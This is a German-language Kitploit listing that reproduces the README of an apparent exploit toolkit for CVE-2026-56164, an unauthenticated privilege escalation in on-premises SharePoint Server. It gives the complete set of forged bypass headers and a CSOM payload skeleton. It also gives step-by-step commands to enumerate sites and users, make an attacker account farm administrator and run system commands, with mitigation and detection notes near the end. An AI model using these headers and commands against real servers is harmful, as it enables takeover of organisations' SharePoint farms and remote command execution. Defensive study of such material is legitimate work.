Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2026-56164-exploit — CVE-2026-56164 ist eine kritische Schwachstelle mit fehlender Authentifizierung, die lokale Microsoft SharePoint Server-Installationen betrifft. Sie ermöglicht es nicht authentifizierten Remote-Angreifern, über ein Netzwerk Privilegien zu erweitern. | Kitploit
Tools/GitHubGitHub/sam00/poc-cve-2026-56164-exploit
Authentifizierung & AutorisierungPrivilege EscalationSchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
sam00/poc-cve-2026-56164-exploit

POC-CVE-2026-56164-exploit

CVE-2026-56164 ist eine kritische Schwachstelle mit fehlender Authentifizierung, die lokale Microsoft SharePoint Server-Installationen betrifft. Sie ermöglicht es nicht authentifizierten Remote-Angreifern, über ein Netzwerk Privilegien zu erweitern.

Repository anzeigen
2vor 15 TagenNoch nicht geprüft

CVE-2026-56164 – Exploit zur Umgehung der Microsoft SharePoint Server-Authentifizierung

Kritisch (CVSS 9.8) – Nicht authentifizierte Rechteausweitung zum Farm-Administrator in Microsoft SharePoint Server

Inhaltsverzeichnis

  • Überblick
  • Details zur Sicherheitslücke
  • Betroffene Versionen
  • Architekturdiagramme
  • Projektstruktur
  • Installation
  • Scanner-Nutzung – Schritt für Schritt
  • Exploit-Nutzung – Schritt für Schritt
  • Payload-Design
  • Gegenmaßnahmen
  • Haftungsausschluss

Überblick

Bei CVE-2026-56164 handelt es sich um eine kritische Sicherheitslücke mit fehlender Authentifizierung in Microsoft SharePoint Server, die es einem nicht authentifizierten Remote-Angreifer ermöglicht, seine Rechte auf Farm-Administrator-Ebene auszuweiten. Die Sicherheitslücke befindet sich in der Assembly Microsoft.Office.Server.UserProfiles, die SOAP-Anfragen unter /_vti_bin/client.svc/ProcessQuery verarbeitet.

Indem der X-RequestDigest-Header absichtlich weggelassen und bestimmte Routing-Header mitgeliefert werden, fällt der verwundbare Server auf einen erhöhten Sicherheitskontext zurück, anstatt die nicht authentifizierte Anfrage abzulehnen. Dadurch können anonyme Angreifer Websitesammlungen, Benutzer und Farmkonfiguration auflisten, Administratoren hinzufügen und Befehle ausführen.

CISA KEV: Diese Sicherheitslücke ist aufgrund der aktiven Ausnutzung in freier Wildbahn im Katalog der bekannten ausgenutzten Sicherheitslücken (Known Exploited Vulnerabilities Catalog) von CISA aufgeführt.


Details zur Sicherheitslücke

Grundursache

Der Handler Microsoft.Office.Server.UserProfiles verarbeitet SOAP-Anfragen unter /_vti_bin/client.svc/ProcessQuery. Normalerweise validiert SharePoint den X-RequestDigest-Header, um den Authentifizierungskontext sicherzustellen. Es existiert jedoch eine Validierungsumgehung:

  1. Wenn X-RequestDigest fehlt UND bestimmte Routing-Header vorhanden sind
  2. Wertet das System die Routing-Parameter aus und fällt auf einen hochprivilegierten Standardzustand zurück
  3. Wird die Anfrage mit Anmeldeinformationen auf Systemebene verarbeitet, anstatt mit dem Sicherheitskontext des Aufrufers

Verwundbarer Codepfad

root@kitploit:~
// Vulnerable: If digest is missing, handler checks routing headers
if (string.IsNullOrEmpty(digest) && CheckSpecialRoutingHeaders(context)) {
    // Bypasses standard identity validation → elevated admin session
    InitializeElevatedSecurityContext(context);
} else {
    ValidateRequestDigest(digest);  // Normal path
}

Behobener Code

root@kitploit:~
// Patched: Digest validation is unconditional
if (string.IsNullOrEmpty(digest)) {
    context.Response.StatusCode = 401;
    throw new UnauthorizedAccessException("Missing request digest.");
}
ValidateRequestDigest(digest);
InitializeStandardSecurityContext(context);

Referenzen zu den Sicherheitshinweisen

  • MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-56164
  • CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-56164

Betroffene Versionen

ProduktBetroffene VersionenBehobene Version
SharePoint Enterprise Server 2016Alle 16.0.x vor dem Patch16.0.5561.1001
SharePoint Server 2019Alle 16.0.x vor dem Patch16.0.10417.20175

Nicht betroffen: SharePoint Online (Microsoft 365)


Architekturdiagramme

Systemarchitektur

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│                   CVE-2026-56164 Exploit Toolkit                     │
├─────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  ┌────────────┐     ┌─────────────────┐     ┌────────────────────┐  │
│  │  scan.py   │────▶│  HTTP Fingerprint│     │  payload_gen.py    │  │
│  │  Scanner   │     │  + Version Check │     │                    │  │
│  └────────────┘     └─────────────────┘     │  ┌──────────────┐  │  │
│         │                                   │  │ CSOM Payloads│  │  │
│         │  Reports:                         │  │ (detection,  │  │  │
│         │  • SharePoint detected?           │  │  enum,       │  │  │
│         │  • Server version                 │  │  elevate,    │  │  │
│         │  • Vulnerable?                    │  │  execute)    │  │  │
│         │  • Auth bypass confirmed?         │  └──────────────┘  │  │
│         ▼                                   │  ┌──────────────┐  │  │
│  ┌────────────┐     ┌─────────────────┐     │  │ SOAP Payloads│  │  │
│  │ exploit.py │────▶│  HTTP Request   │     │  │ (admin, exec)│  │  │
│  │  Exploit   │     │  Delivery       │     │  └──────────────┘  │  │
│  └────────────┘     └─────────────────┘     │  ┌──────────────┐  │  │
│         │                                   │  │ Bypass       │  │  │
│         │  ┌──────────────────────┐         │  │ Headers      │  │  │
│         ├─▶│ MODE: detect         │         │  │ (routing)    │  │  │
│         │  │ Safe, non-intrusive  │         │  └──────────────┘  │  │
│         │  └──────────────────────┘         │  ┌──────────────┐  │  │
│         │  ┌──────────────────────┐         │  │ HTTP Request │  │  │
│         ├─▶│ MODE: enumerate      │         │  │ Builder      │  │  │
│         │  │ Sites, users, config │         │  └──────────────┘  │  │
│         │  └──────────────────────┘         └────────────────────┘  │
│         │  ┌──────────────────────┐                                 │
│         ├─▶│ MODE: elevate        │     ┌──────────────────────┐    │
│         │  │ Add site/farm admin  │     │ Target SharePoint    │    │
│         │  └──────────────────────┘     │ /_vti_bin/client.svc │    │
│         │  ┌──────────────────────┐     │ /_vti_bin/SPAdmin    │    │
│         └─▶│ MODE: execute        │     └──────────────────────┘    │
│            │ System commands      │                                 │
│            └──────────────────────┘                                 │
│         │  ┌──────────────────────┐                                 │
│         └─▶│ MODE: full           │  detect→enum→elevate→execute    │
│            └──────────────────────┘                                 │
└─────────────────────────────────────────────────────────────────────┘

Scanner-Ablauf

root@kitploit:~
┌─────────────┐
│  Start Scan │
└──────┬──────┘
       │
       ▼
┌──────────────────┐     No     ┌─────────────┐
│ Target reachable?│──────────▶│  Skip       │
└──────┬───────────┘            └─────────────┘
       │ Yes
       ▼
┌──────────────────┐
│ Send HTTP GET    │
│ to common ports  │
│ (443,80,8080,    │
│  8443)           │
└──────┬───────────┘
       │
       ▼
┌──────────────────┐     No     ┌─────────────┐
│ SharePoint       │──────────▶│ Not SP      │
│ fingerprint?     │            └─────────────┘
│ (MSST header,    │
│  _vti_bin,       │
│  suitebar, etc.) │
└──────┬───────────┘
       │ Yes
       ▼
┌──────────────────┐
│ Extract version  │
│ from MSST header │
│ / response body  │
└──────┬───────────┘
       │
       ▼
┌──────────────────┐     No     ┌─────────────┐
│ Version in       │──────────▶│ Not         │
│ vulnerable       │            │ vulnerable  │
│ range?           │            └─────────────┘
└──────┬───────────┘
       │ Yes
       ▼
┌──────────────────┐
│ Test auth bypass │
│ (CSOM req w/o    │
│  digest + bypass │
│  headers)        │
└──────┬───────────┘
       │
       ▼
┌──────────────────┐
│ Report:          │
│ • VULNERABLE     │
│ • Version        │
│ • Bypass status  │
│ • SSL cert info  │
└──────────────────┘

Exploit-Ablauf (Vollständige Kette)

root@kitploit:~
┌──────────────────────────────────────────────────────────────────┐
│  FULL EXPLOIT CHAIN                                              │
│                                                                  │
│  1. Detect — Authentication Bypass                               │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  POST /_vti_bin/client.svc/ProcessQuery                  │   │
│  │  [NO X-RequestDigest]                                    │   │
│  │  X-SharePoint-Authenticated: 1                           │   │
│  │  X-SP-RequestRights: FullControl                         │   │
│  │  SPHomeBearerHint: farmadmin                             │   │
│  │  Body: CSOM detection payload                            │   │
│  │                                                          │   │
│  │  → If 200: AUTH BYPASS CONFIRMED                         │   │
│  │  → If 401: Not vulnerable                                │   │
│  └──────────────────────────────────────────────────────────┘   │
│                           │                                      │
│  2. Enumerate            ▼                                      │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  Enumerate site collections (URL, owner, status)         │   │
│  │  Enumerate users (account, display name, email, admin)   │   │
│  │  Retrieve farm config (DB name, server, farm ID)         │   │
│  └──────────────────────────────────────────────────────────┘   │
│                           │                                      │
│  3. Elevate             ▼                                      │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  SetIsSiteAdmin(true) → Current context = Site Admin     │   │
│  │  AddUserToWeb → Add specific user as Farm Administrator  │   │
│  └──────────────────────────────────────────────────────────┘   │
│                           │                                      │
│  4. Execute             ▼                                      │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  POST /_vti_bin/SharePointAdmin.asmx                     │   │
│  │  Body: ExecuteCommand SOAP payload                       │   │
│  │  → System command executed with farm-level privileges    │   │
│  └──────────────────────────────────────────────────────────┘   │
└──────────────────────────────────────────────────────────────────┘

Projektstruktur

root@kitploit:~
POC-CVE-2026-56164-exploit/
├── payload_gen.py      # Payload generation (CSOM, SOAP, bypass headers)
├── scan.py             # Vulnerability scanner (SharePoint detection + version check)
├── exploit.py          # Exploit orchestrator (detect/enumerate/elevate/execute/full)
├── requirements.txt    # Python dependencies
└── README.md           # This file

Installation

root@kitploit:~
# Clone the repository
git clone [email protected]:sam00/POC-CVE-2026-56164-exploit.git
cd POC-CVE-2026-56164-exploit

# Install dependencies
pip3 install -r requirements.txt

Voraussetzungen: Python 3.8+, requests-Bibliothek (optional – standardmäßig wird urllib aus der Standardbibliothek verwendet).


Scanner-Nutzung – Schritt für Schritt

Der Scanner führt sichere, nicht-intrusive Prüfungen durch, um verwundbare SharePoint-Server-Ziele zu identifizieren.

Schritt 1: Ein einzelnes Ziel scannen

root@kitploit:~
python3 scan.py --target sharepoint.example.com

Der Scanner führt Folgendes aus:

  • Sondiert gängige Ports (443, 80, 8080, 8443)
  • Sendet HTTP-Anfragen und prüft auf SharePoint-Fingerprints (Header, Antwortinhalte)
  • Extrahiert die SharePoint-Version aus dem MicrosoftSharePointTeamServices-Header
  • Prüft, ob die Version in verwundbare Bereiche fällt
  • Testet die Authentifizierungsumgehung (optional)
  • Gibt einen farbcodierten Bericht aus

Schritt 2: Mit einem bestimmten Port scannen

root@kitploit:~
python3 scan.py --target sharepoint.example.com --port 443

Schritt 3: Mehrere Ziele aus einer Datei scannen

Erstellen Sie eine Datei targets.txt:

root@kitploit:~
sharepoint1.example.com
sharepoint2.example.com
10.0.0.5
# Comments are ignored
root@kitploit:~
python3 scan.py --targets targets.txt

Schritt 4: Bypass-Test überspringen (nur Fingerprinting)

root@kitploit:~
python3 scan.py --target sharepoint.example.com --no-bypass-test

Schritt 5: Ergebnisse als JSON speichern

root@kitploit:~
python3 scan.py --target sharepoint.example.com --json scan_results.json

Was der Scanner erkennt


Exploit-Nutzung – Schritt für Schritt

Der Exploit unterstützt fünf Modi mit zunehmender Intensität.

Modus 1: Erkennen (sicher, nicht-intrusiv)

Testet die Authentifizierungsumgehung, indem eine normale Anfrage (mit Digest) mit einer Bypass-Anfrage (ohne Digest + Routing-Header) verglichen wird.

root@kitploit:~
python3 exploit.py --target sharepoint.example.com --mode detect

Modus 2: Auflisten (Offenlegung von Informationen)

Extrahiert Websitesammlungen, Benutzer und Farmkonfiguration mithilfe der Authentifizierungsumgehung.

root@kitploit:~
python3 exploit.py --target sharepoint.example.com --mode enumerate

Modus 3: Rechteausweitung (Privilege Escalation)

Hebt den aktuellen anonymen Kontext oder einen bestimmten Benutzer auf Website-Sammlungsadministrator / Farm-Administrator an.

root@kitploit:~
# Elevate current context
python3 exploit.py --target sharepoint.example.com --mode elevate

# Elevate specific user
python3 exploit.py --target sharepoint.example.com --mode elevate --login "DOMAIN\\attacker"

Modus 4: Ausführen (Befehlsausführung)

Führt einen Systembefehl über den SharePoint-Administrations-SOAP-Dienst aus.

root@kitploit:~
python3 exploit.py --target sharepoint.example.com --mode execute --command "whoami"

Modus 5: Vollständige Kette (Erkennen → Auflisten → Rechteausweitung → Ausführen)

Führt die vollständige Exploit-Kette der Reihe nach aus.

root@kitploit:~
python3 exploit.py --target sharepoint.example.com --mode full --command "whoami"

Allgemeine Optionen

  • --port / -p: Zielport (Standard: 443)
  • --http: HTTP anstelle von HTTPS verwenden
  • --site-url / -s: SharePoint-Website-URL (Standard: Ziel)
  • --json / -j: Bericht als JSON speichern
  • --timeout: Anfrage-Timeout in Sekunden (Standard: 30)

Payload-Design

Mechanismus der Authentifizierungsumgehung

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  HTTP Request to /_vti_bin/client.svc/ProcessQuery             │
├─────────────────────────────────────────────────────────────────┤
│  POST /_vti_bin/client.svc/ProcessQuery HTTP/1.1              │
│  Host: sharepoint.example.com                                  │
│  Content-Type: text/xml; charset=utf-8                         │
│  [X-RequestDigest: OMITTED]                                    │
│  X-SharePoint-Authenticated: 1                                 │
│  X-SP-RequestRights: FullControl                               │
│  X-SP-RequestRights2: ManageLists, ManageWeb                   │
│  SPHomeBearerHint: farmadmin                                   │
│  X-RequestForceAuthentication: false                           │
│  X-SP-Proxy: internal                                          │
│  X-Forwarded-For: 127.0.0.1                                    │
│  X-Original-URL: /_vti_bin/client.svc/ProcessQuery             │
│                                                                 │
│  [CSOM/SOAP Payload Body]                                      │
└─────────────────────────────────────────────────────────────────┘
         │
         ▼
┌─────────────────────────────────────────────────────────────────┐
│  Vulnerable SharePoint Server                                   │
│                                                                 │
│  1. digest = Headers["X-RequestDigest"]  → NULL                │
│  2. CheckSpecialRoutingHeaders(context)  → TRUE (≥3 headers)   │
│  3. InitializeElevatedSecurityContext()  → FARM ADMIN          │
│  4. Process SOAP request with system-level credentials          │
└─────────────────────────────────────────────────────────────────┘

CSOM-Payload-Struktur

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<Request xmlns="http://schemas.microsoft.com/sharepoint/clientquery/2009"
         ApplicationName="SharePointExploit"
         LibraryVersion="16.0.0"
         RequestId="{UUID}">
  <Actions>
    [Detection / Enumeration / Elevation actions]
  </Actions>
  <Context>
    <ContextId>Current</ContextId>
    <Version>16.0.0</Version>
    <SiteUrl>{TARGET}</SiteUrl>
  </Context>
</Request>

Bypass-Routing-Header


Gegenmaßnahmen

Sofortmaßnahmen

  1. Microsoft-Sicherheitsupdates einspielen – Installieren Sie die SharePoint-Patches vom Juli 2026
  2. Zugriff einschränken – Beschränken Sie SharePoint-Endpunkte auf vertrauenswürdige Netzwerke
  3. Blockieren Sie externen Zugriff auf /_vti_bin/-Endpunkte über Reverse-Proxy-/WAF-Regeln
  4. Überwachen Sie Protokolle auf nicht authentifizierte Anfragen an /_vti_bin/client.svc/ProcessQuery

Behobene Versionen

  • SharePoint Enterprise Server 2016: 16.0.5561.1001+
  • SharePoint Server 2019: 16.0.10417.20175+
  • SharePoint Server Subscription Edition: 16.0.19725.20434+

Erkennung

  • Achten Sie auf POST-Anfragen an /_vti_bin/client.svc/ProcessQuery ohne X-RequestDigest-Header
  • Achten Sie auf Anfragen mit mehreren Bypass-Routing-Headern (X-SharePoint-Authenticated, SPHomeBearerHint usw.)
  • Überwachen Sie unerwartete Hinzufügungen von Website-Sammlungsadministratoren
  • Alarmieren Sie bei SOAP-Anfragen an /_vti_bin/SharePointAdmin.asmx aus nicht authentifizierten Quellen

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Die unbefugte Verwendung gegen Produktionssysteme ist illegal und kann gegen Gesetze gegen Computerbetrug und -missbrauch verstoßen.

Die Autoren übernehmen keine Haftung für die missbräuchliche Verwendung dieses Tools. Befolgen Sie stets verantwortungsvolle Offenlegungspraktiken und halten Sie sich an geltende Gesetze und Vorschriften.

Tool herunterladen
FeldWert
CVE IDCVE-2026-56164
SchweregradKRITISCH
CVSS 3.19.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWECWE-306: Fehlende Authentifizierung für kritische Funktion
AuswirkungNicht authentifizierte Rechteausweitung zum Farm-Administrator
AusnutzungsstatusAktive Ausnutzung (CISA KEV)
MITRE ATT&CKT1190 (Exploit Public-Facing Application)
SharePoint Server Subscription EditionAlle 16.0.x vor dem Patch16.0.19725.20434
IndikatorMethode
SharePoint ServerHTTP-Header-Fingerprinting (MicrosoftSharePointTeamServices, SPRequestGuid)
ServerversionHeader-Parsing + RegEx im Antworttext
Verwundbare VersionVergleich mit den behobenen Versionen für CVE-2026-56164
AuthentifizierungsumgehungCSOM-Anfrage ohne X-RequestDigest + Bypass-Routing-Header
SSL-ZertifikatZertifikatsantragsteller/-aussteller zur Zielidentifikation
HeaderWertZweck
X-SharePoint-Authenticated1Behaupten, dass die Authentifizierung bereits erfolgt ist
X-SP-RequestRightsFullControlVollzugriffsberechtigungen anfordern
X-SP-RequestRights2ManageLists, ManageWebZusätzliche Verwaltungsrechte
SPHomeBearerHintfarmadminHinweis auf Farm-Administrator-Kontext
X-RequestForceAuthenticationfalseErzwungene Authentifizierung deaktivieren
X-SP-ProxyinternalInternen Proxy-Ursprung behaupten
X-Forwarded-For127.0.0.1Lokalen Ursprung vortäuschen
X-Original-URL/_vti_bin/client.svc/ProcessQueryRouting-Anweisung